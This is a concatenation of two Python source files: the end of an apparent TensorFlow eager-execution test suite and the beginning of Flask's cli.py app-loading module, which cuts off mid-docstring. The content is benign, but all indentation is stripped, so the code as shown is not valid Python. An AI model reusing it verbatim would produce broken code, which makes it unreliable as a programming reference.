with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.async_wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.async_wait()
context.async_clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
test_var = variables.Variable([2., 3.])
self.assertAllEqual(test_fn(test_var), 1.0)
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
context.set_execution_mode(context.ASYNC)
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))
context.async_wait()
context.async_clear_error()
context.context().execution_mode = context.SYNC
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEquals(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
configure_virtual_cpus()
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = constant_op.constant(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertEqual(cache.get('1'), None)
cache.put('2', array_ops.zeros((2)))
self.assertNotEqual(cache.get('2'), None)
if __name__ == '__main__':
test.main()
|
cli.py
|
import ast
import inspect
import os
import platform
import re
import sys
import traceback
import warnings
from functools import update_wrapper
from operator import attrgetter
from threading import Lock
from threading import Thread
import click
from werkzeug.utils import import_string
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_env
from .helpers import get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
try:
import ssl
except ImportError:
ssl = None # type: ignore
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in module.__dict__.values() if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
"Detected multiple Flask applications in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
f" to specify the correct one."
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError as e:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
f"Detected factory {attr_name!r} in module {module.__name__!r},"
" but could not call it without arguments. Use"
f" \"FLASK_APP='{module.__name__}:{attr_name}(args)'\""
" to specify arguments."
) from e
raise NoAppException(
"Failed to find Flask application or factory in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
" to specify one."
)
def call_factory(script_info, app_factory, args=None, kwargs=None):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
sig = inspect.signature(app_factory)
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
if "script_info" in sig.parameters:
warnings.warn(
"The 'script_info' argument is deprecated and will not be"
" passed to the app factory function in Flask 2.1.",
DeprecationWarning,
)
kwargs["script_info"] = script_info
if not args and len(sig.parameters) == 1:
first_parameter = next(iter(sig.parameters.values()))
if (
first_parameter.default is inspect.Parameter.empty
# **kwargs is reported as an empty default, ignore it
and first_parameter.kind is not inspect.Parameter.VAR_KEYWORD
):
warnings.warn(
"Script info is deprecated and will not be passed as the"
" single argument to the app factory function in Flask"
" 2.1.",
DeprecationWarning,
)
args.append(script_info)
return app_factory(*args, **kwargs)
def _called_with_wrong_args(f):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param f: The function that was called.
:return: ``True`` if the call failed.
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is f.__code__:
# In the function, it was called successfully.
return False
tb = tb.tb_next
# Didn't reach the function.
return True
finally:
# Delete tb to break a circular reference.
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(script_info, module, app_name):
"""Check if the given string is a variable name or a function. Call
a function to get the app instance, or return the variable directly.
"""
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
# attribute name or function call.
try:
expr = ast.parse(app_name.strip(), mode="eval").body
except SyntaxError:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
) from None
if isinstance(expr, ast.Name):
name = expr.id
args = kwargs = None
elif isinstance(expr, ast.Call):
# Ensure the function name is an attribute name only.
if not isinstance(expr.func, ast.Name):
raise NoAppException(
f"Function reference must be a simple name: {app_name!r}."
)
name = expr.func.id
# Parse the positional and keyword arguments as literals.
try:
args = [ast.literal_eval(arg) for arg in expr.args]
kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords}
except ValueError:
# literal_eval gives cryptic error messages, show a generic
# message with the full expression instead.
raise NoAppException(
f"Failed to parse arguments as literal values: {app_name!r}."
) from None
else:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(
f"Failed to find attribute {name!r} in {module.__name__!r}."
) from e
# If the attribute is a function, call it with any args and kwargs
# to get the real application.
if inspect.isfunction(attr):
try:
app = call_factory(script_info, attr, args, kwargs)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
f"The factory {app_name!r} in module"
f" {module.__name__!r} could not be called with the"
" specified arguments."
) from e
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from"
f" '{module.__name__}:{app_name}'."
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True # noqa: F841
try:
__import__(module_name)
except ImportError as e:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[2].tb_next:
raise NoAppException(
f"While importing {module_name!r}, an ImportError was raised."
) from e
elif raise_if_not_found:
raise NoAppException(f"Could not import {module_name!r}.") from e
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
from . import __version__
click.echo(
f"Python {platform.python_version()}\n"
f"Flask {__version__}\n"
f"Werkzeug {werkzeug.__version__}",
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp:
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=None):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc = None
if use_eager_loading is None:
use_eager_loading = os.environ.get("WERKZEUG_RUN_MAIN") != "true"
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True # noqa: F841
with self._lock:
try:
self._load_unlocked()
except Exception as e:
self._bg_loading_exc = e
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True # noqa: F841
exc = self._bg_loading_exc
if exc is not None:
self._bg_loading_exc = None
raise exc
def _load_unlocked(self):
__traceback_hide__ = True # noqa: F841
self._app = rv = self.loader()
self._bg_loading_exc = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True # noqa: F841
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo:
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True # noqa: F841
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this. see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra,
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# Look up built-in and plugin commands, which should be
# available even if the app fails to load.
rv = super().get_command(ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
# Look up commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
return info.load_app().cli.get_command(ctx, name)
except NoAppException as e:
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
def list_commands(self, ctx):
self._load_plugin_commands()
# Start with the built-in and plugin commands.
rv = set(super().list_commands(ctx))
info = ctx.ensure_object(ScriptInfo)
# Add commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
rv.update(info.load_app().cli.list_commands(ctx))
except NoAppException as e:
# When an app couldn't be loaded, show the error message
# without the traceback.
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
except Exception:
# When any other errors occurred during loading, show the
# full traceback.
click.secho(f"{traceback.format_exc()}\n", err=True, fg="red")
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super().main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionchanged:: 2.0
When loading the env files, set the default encoding to UTF-8.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
err=True,
)
return False
# if the given path specifies the actual file then return True,
# else False
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path, encoding="utf-8")
return False
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path, encoding="utf-8")
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = f" * Serving Flask app {app_import_path!r}"
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(f" * Environment: {env}")
if env == "production":
click.secho(
" WARNING: This is a development server. Do not use it in"
" a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(f" * Debug mode: {'on' if debug else 'off'}")
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
